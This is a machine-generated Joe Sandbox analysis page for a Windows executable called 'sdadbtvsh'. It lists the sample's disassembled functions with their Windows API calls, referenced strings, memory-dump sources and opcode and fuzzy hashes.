__freea.LIBCMT ref: 005C67A3

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 5c8adea203154dffdb84779bc4603d9760aece2ba4f0b85a972f9679dbdcebdf
Instruction ID: 8a8881e2aae7da05a3387d19ba171769bd3875fc5ab306896ad93ac7bb277939
Opcode Fuzzy Hash: 5c8adea203154dffdb84779bc4603d9760aece2ba4f0b85a972f9679dbdcebdf
Instruction Fuzzy Hash: 0E51BF72600216AFEB258FA4CC85FAA7FFAFB84754F144A2DF805D6150EB34DE50C691

Uniqueness

Uniqueness Score: -1.00%

Function 0061C53A Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

Part of subcall function 0061D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061C00D,?,?), ref: 0061D314
Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D350
Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3C7
Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3FD

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061C629
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061C684
RegCloseKey.ADVAPI32(00000000), ref: 0061C6C9
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0061C6F8
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0061C752
RegCloseKey.ADVAPI32(?), ref: 0061C75E

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 4312deb8a6bb9dfd221fb30fe0676c5ce14d718d470ac9e2f6d76d64cdbfad7d
Instruction ID: b6d0546a2d70fb1c7d587831ea9757243f01cdec160db59318de6e2ee95df9b1
Opcode Fuzzy Hash: 4312deb8a6bb9dfd221fb30fe0676c5ce14d718d470ac9e2f6d76d64cdbfad7d
Instruction Fuzzy Hash: 1E818D70208341AFD714DF24C895EAABBE6FF84318F18855CF4558B2A2DB71ED46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 005F003D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 005F0049
SysAllocString.OLEAUT32(00000000), ref: 005F00F0
VariantCopy.OLEAUT32(005F02F4,00000000), ref: 005F0119
VariantClear.OLEAUT32(005F02F4), ref: 005F013D
VariantCopy.OLEAUT32(005F02F4,00000000), ref: 005F0141
VariantClear.OLEAUT32(?), ref: 005F014B

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 49821a2c42f763ce7784d2e2acfffc2a4da312fd31ccd7ba3c642144d62046a1
Instruction ID: 52f53a4e2fd4cf4fbd63d0021efc0e6a2f5edab97aa5a4233295ce9136a45618
Opcode Fuzzy Hash: 49821a2c42f763ce7784d2e2acfffc2a4da312fd31ccd7ba3c642144d62046a1
Instruction Fuzzy Hash: 5D511A35540305AADF20AB64DC99B39BBE9FF85310B18A406EA01DF2D7DB789C40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00606DE8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00606E36
CoInitialize.OLE32(00000000), ref: 00606F93
CoCreateInstance.OLE32(00630CC4,00000000,00000001,00630B34,?), ref: 00606FAA
CoUninitialize.OLE32 ref: 0060722E

Strings

.lnk, xrefs: 00606E14, 00606E7E, 00606F3A

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: ffcb3ff3cc0f35f66c2255cba9cce922f02c301062964375d24c631d9cfca0f0
Instruction ID: ee364b6350a8fc2494b6d6a8d59cfc9e015768815dcfc36d0d93a53e35057318
Opcode Fuzzy Hash: ffcb3ff3cc0f35f66c2255cba9cce922f02c301062964375d24c631d9cfca0f0
Instruction Fuzzy Hash: 7AD15771608302AFD704EF24D8859ABBBE9FF95704F04495DF1858B2A2DB71ED06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 006010AB Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 006010C8
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00601103
EnterCriticalSection.KERNEL32(?), ref: 0060111F
LeaveCriticalSection.KERNEL32(?), ref: 00601198
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006011AF
InterlockedExchange.KERNEL32(?,000001F6), ref: 006011DD

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: c35cf446e01959b187a784ffac4723aacda2a6da649e724dff5f722021be0fd0
Instruction ID: 3e2e27a243d32913c4fe4d064fca31a5db7acf90a5217991881a26a51180f752
Opcode Fuzzy Hash: c35cf446e01959b187a784ffac4723aacda2a6da649e724dff5f722021be0fd0
Instruction Fuzzy Hash: C3415E71900205EBDF189F58DD85AAB7BB9FF44304F1480A5EE009E296D730EE51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00628B3A Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,005EFB8F,00000000,?,?,00000000,?,005D39BC,00000004,00000000,00000000), ref: 00628BAB
EnableWindow.USER32(?,00000000), ref: 00628BD1
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00628C30
ShowWindow.USER32(?,00000004), ref: 00628C44
EnableWindow.USER32(?,00000001), ref: 00628C6A
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00628C8E

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 704cf2474788d7072d877cb301932da5bb4a97442f50922ef712dba3471ba46d
Instruction ID: d4efcf173ca4060d2bf2c7afd4997acbc3105d415356f4853e172b4bca486550
Opcode Fuzzy Hash: 704cf2474788d7072d877cb301932da5bb4a97442f50922ef712dba3471ba46d
Instruction Fuzzy Hash: 1E419374603954AFDB26CF14EC99BE17BE2BB45315F1851A9E5084F362CB71A841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00612C37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00612C45

Part of subcall function 0060EE49: GetWindowRect.USER32(?,?), ref: 0060EE61

GetDesktopWindow.USER32 ref: 00612C6F
GetWindowRect.USER32(00000000), ref: 00612C76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00612CB2
GetCursorPos.USER32(?), ref: 00612CDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00612D3C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: d64713c1a9562809f9296c378abaf32cd1c12d627292d4af62d4cedde9968342
Instruction ID: 08ed4ed72cee3ccec5345b6dd4f92796c558168a84e3f46b8de9ddcfa7a1bf81
Opcode Fuzzy Hash: d64713c1a9562809f9296c378abaf32cd1c12d627292d4af62d4cedde9968342
Instruction Fuzzy Hash: BC31DE72504316ABD720DF14C849E9ABBAAFFC4314F04091AF985A7281CB30E959CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00606178 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E

_wcslen.LIBCMT ref: 006061D5
CoInitialize.OLE32(00000000), ref: 006062EF
CoCreateInstance.OLE32(00630CC4,00000000,00000001,00630B34,?), ref: 00606308
CoUninitialize.OLE32 ref: 00606326

Strings

.lnk, xrefs: 006061D0, 0060621B, 006062DF

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 512050eba28306613e7b1bf499b227b2e88e1c7f7078c06b13a2e7dea70c2d95
Instruction ID: e3ede9d388accf46c648f4288435dea50fc0feb965649df3c756a3b6f11dbcec
Opcode Fuzzy Hash: 512050eba28306613e7b1bf499b227b2e88e1c7f7078c06b13a2e7dea70c2d95
Instruction Fuzzy Hash: FAD142756042019FCB18DF24C494A6BBBE6FF89714F14885CF8869B3A1CB31ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 005C3104 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,005B4D73,00000000,?,?,005B6902,?,?,00000000), ref: 005C3108
_free.LIBCMT ref: 005C313B
_free.LIBCMT ref: 005C3163
SetLastError.KERNEL32(00000000,?,00000000), ref: 005C3170
SetLastError.KERNEL32(00000000,?,00000000), ref: 005C317C
_abort.LIBCMT ref: 005C3182

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: bff3ac70b307c77fbb6b56ee74df282a27492024049e162ebd183617ab2f3b5b
Instruction ID: d6710dffbb2ad49bc24eb39d9bab5d5faaa440e2cc3b622440483f976cb007fd
Opcode Fuzzy Hash: bff3ac70b307c77fbb6b56ee74df282a27492024049e162ebd183617ab2f3b5b
Instruction Fuzzy Hash: 1DF0F931504A056ED33263F4AC0EF5A2E6ABFD6761F29881CF415D21D1FF208A43C151

Uniqueness

Uniqueness Score: -1.00%

Function 00593205 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00593236
MapVirtualKeyW.USER32(00000010,00000000), ref: 0059323E
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00593249
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00593254
MapVirtualKeyW.USER32(00000011,00000000), ref: 0059325C
MapVirtualKeyW.USER32(00000012,00000000), ref: 00593264

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: afa9d6aacb8b3c598b083e4e66580860aefb7fc297cb37694bf875469409ea80
Instruction ID: 7bb845c98be780c6af44cef954ac00fd4dd59f65fd010dd8606d020ab9e5c37c
Opcode Fuzzy Hash: afa9d6aacb8b3c598b083e4e66580860aefb7fc297cb37694bf875469409ea80
Instruction Fuzzy Hash: BC0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 005F2104 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 005F210F
UnloadUserProfile.USERENV(?,?), ref: 005F211B
CloseHandle.KERNEL32(?), ref: 005F2124
CloseHandle.KERNEL32(?), ref: 005F212C
GetProcessHeap.KERNEL32(00000000,?), ref: 005F2135
HeapFree.KERNEL32(00000000), ref: 005F213C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: fce6aac9a9568ed4a3180cbd60a994714beaa764fa508c265242d711b74c0b49
Instruction ID: 7c1f44314fa93481a751cdaaac67e53c2916b4854bfb757ce40b06f2aa2dac8b
Opcode Fuzzy Hash: fce6aac9a9568ed4a3180cbd60a994714beaa764fa508c265242d711b74c0b49
Instruction Fuzzy Hash: 94E01A76004902BFDB115FA1ED0CD0ABF3BFF49322B105220F22586474CB329432DB90

Uniqueness

Uniqueness Score: -1.00%

Function 005FCD90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00594154: _wcslen.LIBCMT ref: 00594159

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005FCEAE
_wcslen.LIBCMT ref: 005FCEF5
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005FCF5C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 005FCF8A

Strings

0, xrefs: 005FCE6F

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: baea39646cbded85936abc516bfe78783e05e0580bbf2e357744defa4d2da01c
Instruction ID: ae46d4d8167b661e1122d2dbdecbaace7f2588dc4fac14628ccec4d547537574
Opcode Fuzzy Hash: baea39646cbded85936abc516bfe78783e05e0580bbf2e357744defa4d2da01c
Instruction Fuzzy Hash: 1751E07160430E9BD7249F28CA44ABBBFEABF89314F040A3DFA95D61D0D768D904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 006246DB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00624794
IsMenu.USER32(?), ref: 006247A9
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006247F1
DrawMenuBar.USER32 ref: 00624804

Strings

0, xrefs: 006246E8

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: ba6509228a2eb78d53e5c722889d8fd8904f9389eb7ee8e6e7899592d2c74a6e
Instruction ID: 4bdc38a80fe8efda0d35b6ec41d401c80f43447b92b5cfce9ea32f392ac2a9fe
Opcode Fuzzy Hash: ba6509228a2eb78d53e5c722889d8fd8904f9389eb7ee8e6e7899592d2c74a6e
Instruction Fuzzy Hash: 5F418A75A21A29EFDB20CF50E884AEABBBAFF45314F045129E915A7350CB74ED40CF60

Uniqueness

Uniqueness Score: -1.00%

Function 005F2672 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005F26F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005F2709
SendMessageW.USER32(?,00000189,?,00000000), ref: 005F2739

Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA

Strings

ComboBox, xrefs: 005F2680
ListBox, xrefs: 005F26B5

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 19c95eb6c85f291b51c6e0225ed1826b472c180040c045430cb42d230581831b
Instruction ID: 77731d75999f2a394d832c21ebc45ac3545706126ebaf52a6c95f0a30e3d917c
Opcode Fuzzy Hash: 19c95eb6c85f291b51c6e0225ed1826b472c180040c045430cb42d230581831b
Instruction Fuzzy Hash: D721E4B1900109ABEF14AB64DC4ACFFBF79FF81760F144119F511A31E1CB7C490A8A10

Uniqueness

Uniqueness Score: -1.00%

Function 005B50FD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005B50AE,?,?,005B504E,?,006598D8,0000000C,005B51A5,?,00000002), ref: 005B511D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005B5130
FreeLibrary.KERNEL32(00000000,?,?,?,005B50AE,?,?,005B504E,?,006598D8,0000000C,005B51A5,?,00000002,00000000), ref: 005B5153

Strings

CorExitProcess, xrefs: 005B5128
mscoree.dll, xrefs: 005B5116

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1862448e6e5a1e5d2cc0bab39353498fef54c40277cdac44fa387dd85725d7ee
Instruction ID: 918e3cda6e75de2b1161f58014fc5c88019e59190bac63d77fae847ca377f3ee
Opcode Fuzzy Hash: 1862448e6e5a1e5d2cc0bab39353498fef54c40277cdac44fa387dd85725d7ee
Instruction Fuzzy Hash: 7BF06230A00608BBDB259F95DC49BEDBFBAFF44752F055064F805A62A0DB309D51CA91

Uniqueness

Uniqueness Score: -1.00%

Function 005EE71E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 005EE72B
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 005EE73D
FreeLibrary.KERNEL32(00000000), ref: 005EE763

Strings

GetSystemWow64DirectoryW, xrefs: 005EE737
X64, xrefs: 005EE626

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 1309f7544a4b983ab7f984da3d88f03d204a22f314d64ccc892bef890eb3fc6d
Instruction ID: 7b77f54e0c7fd25af8772a8fcda1a72045274f7ae8ba16103f65859416f8ba3f
Opcode Fuzzy Hash: 1309f7544a4b983ab7f984da3d88f03d204a22f314d64ccc892bef890eb3fc6d
Instruction Fuzzy Hash: 28F0ED31812AA19FDF7A9B219C8EAAD3A29BF15700F144858E885F2520DB30CC49C695

Uniqueness

Uniqueness Score: -1.00%

Function 00596332 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,0059637F,?,?,005960AA,?,00000001,?,?,00000000), ref: 0059633E
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00596350
FreeLibrary.KERNEL32(00000000,?,?,0059637F,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596362

Strings

